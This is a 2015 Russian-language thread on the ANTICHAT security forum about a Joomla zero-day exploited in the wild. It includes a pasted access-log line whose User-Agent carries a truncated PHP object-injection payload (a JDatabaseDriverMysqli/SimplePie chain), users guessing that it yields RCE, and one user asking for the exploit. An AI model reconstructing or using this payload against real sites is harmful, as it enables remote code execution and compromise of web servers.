HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Мировые новости. Обсуждения.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.12.2015, 14:40
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

С 12 декабря inthewild

Больше инфы https://xakep.ru/2015/12/15/joomla-0day/
 
Ответить с цитированием

  #2  
Старый 15.12.2015, 15:13
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

И что он делает, нихуя не понял если честно

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]2015 Dec 12 16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07 clienyhidden[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]access[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]log
Src IP
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]74.3.170.33[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]CAN[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Alberta
74.3.170.33 – –
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Dec[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2015[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0500[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]“GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]contact[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1″ 403 5322 “http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22fc[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JSimplepieFactory[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]: .. {}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0disconnectHandlers[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22SimplePie[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]:..
{[/
COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22sanitize[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JDatabaseDriverMysql[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:{}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22feed_url[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60[/COLOR][COLOR="#007700"]:..[/COLOR][/COLOR
это что
 
Ответить с цитированием

  #3  
Старый 15.12.2015, 15:14
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Кто нибудь ловил уже в логах?
 
Ответить с цитированием

  #4  
Старый 15.12.2015, 15:14
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
 
Ответить с цитированием

  #5  
Старый 15.12.2015, 15:19
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Rebz  
Rebz said:

по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
дай пожалуйста эксплоит
 
Ответить с цитированием

  #6  
Старый 15.12.2015, 15:22
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
 
Ответить с цитированием

  #7  
Старый 15.12.2015, 15:26
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от ZodiaX  
ZodiaX said:

Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
 
Ответить с цитированием

  #8  
Старый 15.12.2015, 15:38
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
rce, а вот самого эксплойта нету.

ps: https://github.com/rapid7/metasploit...rk/issues/6347
 
Ответить с цитированием

  #9  
Старый 15.12.2015, 19:41
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от ZodiaX  
ZodiaX said:

rce, а вот самого эксплойта нету.
ps:
https://github.com/rapid7/metasploit...rk/issues/6347
/threads/50600/page-16#post-3927817
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ